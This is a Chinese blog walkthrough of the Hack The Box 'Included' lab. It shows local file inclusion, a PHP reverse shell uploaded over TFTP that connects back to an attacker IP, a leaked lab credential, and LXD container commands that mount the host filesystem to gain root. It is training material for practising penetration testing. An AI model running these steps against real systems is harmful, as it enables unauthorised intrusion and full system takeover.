Hack The Box - Included

已于 2024-08-22 10:35:56 修改
阅读量645 收藏 20
点赞数 14
分类专栏: Hack The Box 文章标签: 网络安全 web安全
于 2024-08-22 10:33:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51845659/article/details/141404907
版权

答:TFTP

-sU udp方式扫描,扫描效率较慢

答:Local File Inclusion

发送80端口开放

访问一波,看到URL有?file=home.php,可能存在文件包含漏洞(Local File Inclusion)

答:/var/lib/tftpboot

尝试一波目录穿越访问/etc/passwd,获取默认文件夹为/var/lib/tftpboot

tftp:x:110:113:tftp daemon,,,:/var/lib/tftpboot:/usr/sbin/nologin
各字段详细说明:

1、用户名 用户的登录名

2、密码占位符 一般为x或* x表示密码被存储在/etc/shadow文件中

3、用户ID 每个用户在系统中有一个唯一的数字标识符。系统和管理账户通常有特定的 UID(如 root 的 UID 为 0)。普通用户的 UID 从 1000 开始。

4、组ID 指定用户所属的主要用户组的数字标识符。系统将用户分配到一个或多个组,每个组也有一个唯一的 GID。

5、用户信息 用于存储用户的全名或其他描述信息。

6、主目录 用户登录后默认的工作目录。如果用户的主目录不存在,用户将无法登录。

7、登录shell 用户登录后所使用的 shell。它可以是 /bin/bash、/bin/sh、/usr/sbin/nologin 等。usr/sbin/nologin 表示用户不能通过常规方式登录系统。

这里考虑利用TFTP服务上传木马,反弹shell,再进一步查看Web服务器文件夹。

构造反弹shell木马,木马如下,修改攻击机ip为10.10.16.3,指定端口1234

raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

TFTP服务连接并上传木马

本地开启1234端口监听连接

利用文件包含漏洞访问TFTP默认存储路径下,我们上传的木马文件,触发连接。

成功反弹shell,有告警,连接不稳定

/bin/sh: 0: can't access tty; job control turned off

执行命令

script /dev/null -c bash

重定向并建立一个稳定的会话。

在网站目录下查看当前文件夹,这里重点查看.htaccess和.htpasswd,看能不能获取信息。

在.htpasswd文件里面发现了一个用户名为mike,口令为Sheffield19,可用于横向移动。

答:.htpasswd

答:lxd

切换至mike用户,id查看当前用户组

这里需要进一步提权,参考文章lxd/lxc Group - Privilege escalation | HackTricks

提权思路:利用Alpine镜像,下载并在本地构建后,使用HTTP服务器将其上传到远程系统。然后将镜像导入到LXD中,并使用它来挂载主机文件系统获取根特权。

答:alpine

首先安装go环境
sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools

构建lxd distribution builder
 git clone https://github.com/lxc/distrobuilder
 cd distrobuilder
 make

构建过程踩了两个雷,一个是下载模块超时问题

解决使用go get 下载模块下载超时的问题_go: downloading超时-CSDN博客

还有一个就是后续执行发现不支持build-lxd,找到了类似问题是版本过高

Starting point: Included, problem building Alpine - HTB Content - Hack The Box :: Forums

于是换了一个distrobuilder-2.0版本构建

tar wget https://github.com/lxc/distrobuilder/archive/refs/tags/distrobuilder-2.0.zip

解压完进入目录后,再make一下

下载Alpine YAML

mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.18

最后执行build-lxd时又出问题了

修改一下files下的generator值,有非预期的值incus-agent,修改为lxd-agent即可解决这个问题

成功执行生成镜像

sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.18

生成了lxd.tar.xz和rootfs.squashfs两个文件,这里开启服务器供目标机器下载,把文件传过去

python -m http.server 8000

wget http://10.10.16.4:8000/lxd.tar.xz

wget http://10.10.16.4:8000/rootfs.squashfs

查看一下镜像列表,已经成功导入了

lxc image list

设置security.privileged为ture,这样容器就能拥有根文件系统拥有的所有特权
lxc init alpine privesc -c security.privileged=true

在 LXC 容器中添加一个磁盘设备并挂载到/mnt文件夹
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

答:security.privileged=true

启动容器,开启root shell完成提权。

启动容器
lxc start privesc
开启shell
lxc exec privesc /bin/sh

查看当前用户id,是root用户。

答:/mnt/root/

用户flag在/home/mike/user.txt里面

root flag在/mnt/root/root/root.txt

拿下Included!

TCXY
关注
  • 14
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
0x07-HackTheBox-Included
0pr
04-27 550
Recon Masscan nmap 超时了,换成 masscan 只开放了一个 80,又一个 webapp 练习。 Enumeration 主页是这这样的。我今天正好看了 这篇讲 Directory Traversal 的文章。 直接列出了 /etc/passwd 的内容。 打开源码,可以更清楚看到目标机器有一个普通用户 mike。 没有权限直接访问用户家目录。 再找找敏感信息。 我查看...
hackthebox-01startpoint-TIER2-Included
lalalaze的博客
02-08 99
打靶
hackthebox startpoint---Included
qq_43200143的博客
11-25 352
访问首页,发现是一个网站 扫描端口 普通扫描后发现开了80端口 进行UDP扫描 nmap -sU -v xxx 发现69开放,TFTP服务 tftp进行连接 上传文件成功 看一下这个url就感觉有文件包含漏洞呀。。。试试看 成功 所以我们的思路大概是上传一个马,然后连接 关键是一个是可以解析马的文件、另一个是知道路径 管他三七二十一,先传了再说,找一个kali里面的php reverse 马,然后改一下ip和端口 然后上传 T...
HackTheBox-Starting Point--Tier 2---Included
七天
11-16 171
TFTP (Trivial File Transfer Protocol)是一种简单的协议,提供基本的文件传输功能,不需要用户身份验证。文件包含执行reverse-shell.php文件,TFTP文件路径在之前读取/etc/passwd的时候已经发现:/var/lib/tftpboot。TFTP服务器已经连接上,可以上传下载文件,此时可以通过TFTP服务器上传一个反弹shell,使用文件包含漏洞执行shell。在包含/etc/passwd文件后,发现存在mike、tftp用户。3.文件包含漏洞探测。
HackTheBox系列-Pilgrimage
qq_43264813的博客
12-15 1029
25、本地监听1234端口,在靶机中将binwalk_exploit.png下载到/var/www/pilgrimage.htb/shrunk/目录下后查看监听的端口获取到权限为root的shell,查看root目录下的root.txt获取到flag。8、查看分析发现除了网站正常的php文件之外有个magick文件执行后发现其是ImageMagick,版本为7.1.0-49,该工具是一个图片压缩工具。13、将image.png上传网站首页的图片压缩服务,下载压缩后的图片。
HackTheBox-Machines--SolidState
七天
06-05 340
SolidState 测试过程。
0x0F-HackTheBox-Control
0pr
05-12 694
Command History masscan - found several service ports - effective nmap - found http methods and some other services - effective gobuster - found some redirect directories - effective Burp Suite - modified some headers to repeat the request - ineffective Ct
Hack The Box-WifineticTwo
分享
03-20 958
无线网络渗透!额!有点难!
HackTheBox-dynstr WP
h1nt的博客
10-19 2397
0x01 端口探测 使用nmap对靶机端口进行探测: nmap -sV -sC 10.10.10.244 结果如下,除了传统的22和80端口外,还有一个不同寻常的53端口(从后面的渗透过程来看,可以说整个Box都围绕这个端口展开: Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-08 21:57 CST Nmap scan report for 10.10.10.244 Host is up (0.56s latency). Not shown:
HackTheBox-多种姿势渗透beep靶机
weixin_43111940的博客
04-19 345
端口信息 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) | ssh-hostkey: | 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA) |_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA) 25/tcp open s
hackthebox- kotarak(考点:信息搜集隐藏端口 & tom 上传 & 域文件解析 & wget-gnu 1.16提权 )
冬萍子癸水
05-09 1176
1扫描搜集 普通nmap -A 扫。8009打不开,8080是汤姆猫,但是没密码。 没有多少价值信息,很可能端口扫描不全,于是速度版全端口再扫 masscan -p1-65535,U:1-65535 10.10.10.55 --rate=1000 -e tun0 多出来60000.进这个端口看,是个读任意http网页的搜索框工具。 dirbuster扫60000下的目录,看到有server status 通过搜索框,查看自己网站的server status 127.0.0.1:60000/server-
hackthebox-tabby (LFI & tomcat9 渗透 & lxd 提权)
冬萍子癸水
01-17 616
C:\root> nmap -A 10.10.10.194 Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-16 15:49 CST Nmap scan report for 10.10.10.194 (10.10.10.194) Host is up (0.39s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh
Hack the box (HTB) Metatwo靶机
qq_58869808的博客
11-05 5094
hackthebox metatwo靶机
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8423
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全(黑客)——自学2024
最新发布
2401_84466325的博客
08-25 996
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
从密码学角度看网络安全:加密技术的最新进展
A526847的博客
08-20 700
在数字化时代,网络安全已成为不可忽视的重大问题。随着计算机技术和网络应用的飞速发展,黑客和网络攻击手段日益复杂,对个人、企业乃至国家的信息安全构成了严重威胁。密码学作为网络安全领域的核心支柱,其发展对于保护信息安全具有至关重要的作用。本文将探讨加密技术的最新进展,以及这些进展如何助力网络安全
网络安全入门教程(非常详细)从零基础入门到精通_网路安全 教程
2401_85023708的博客
08-21 1416
1.入行网络安全这是一条坚持的道路,三分钟的热情可以放弃往下看了。2.多练多想,不要离开了教程什么都不会了,最好看完教程自己独立完成技术方面的开发。3.有时多百度,我们往往都遇不到好心的大神,谁会无聊天天给你做解答。4.遇到实在搞不懂的,可以先放放,以后再来解决。先科普划分一下级别(全部按小白基础,会写个表格word就行的这种)**1级:脚本小子;难度:无,**达到“黑客新闻”的部分水准(一分钱买iphone、黑掉母校官网挂女神照片什么的)网络安全工程师;
网络安全(黑客)自学
白帽子凯哥聊黑客
08-22 1458
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
hackthebox - reel
11-03
HackTheBox - Reel是一个在黑客社区非常受欢迎的虚拟机靶场。这个靶场的目标是通过渗透测试和攻击手法,找到并获得系统的管理员权限。靶场基于漏洞存在和网络安全问题,提供了一个真实的环境来练习和提升安全技能。 Reel虚拟机是以恶意软件传播为主题的,这是一个很常见但危险的网络攻击。在解决这个靶场时,你需要进行全面的信息搜集,发现可能的漏洞,并利用这些漏洞来控制系统。你还需要进行各种网络嗅探和流量分析操作,以便找到系统中的隐藏服务和登录凭证。 在攻击过程中,你需要利用各种漏洞包括未经授权的访问和远程执行代码等。还需要理解和使用不同的入侵技术,例如命令注入和文件上传等。此外,你可能还需要对恶意软件的分析和行为进行深入研究,以了解其运行机制。 HackTheBox - Reel不仅测试了你的渗透测试技能,而且还促使你加强对恶意软件攻击和防护的了解。同时,这个靶场还有很多高级技术和技巧需要掌握。通过挑战这样的虚拟机,你可以提高你的安全意识和技能,以应对更复杂和高级的网络攻击。 总之,HackTheBox - Reel是一个非常有挑战性的虚拟机靶场,通过攻击和渗透测试,你将提高你的安全技能,并了解到如何防范和对抗恶意软件传播。这是一个很好的方式来锻炼和提升你的网络安全技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值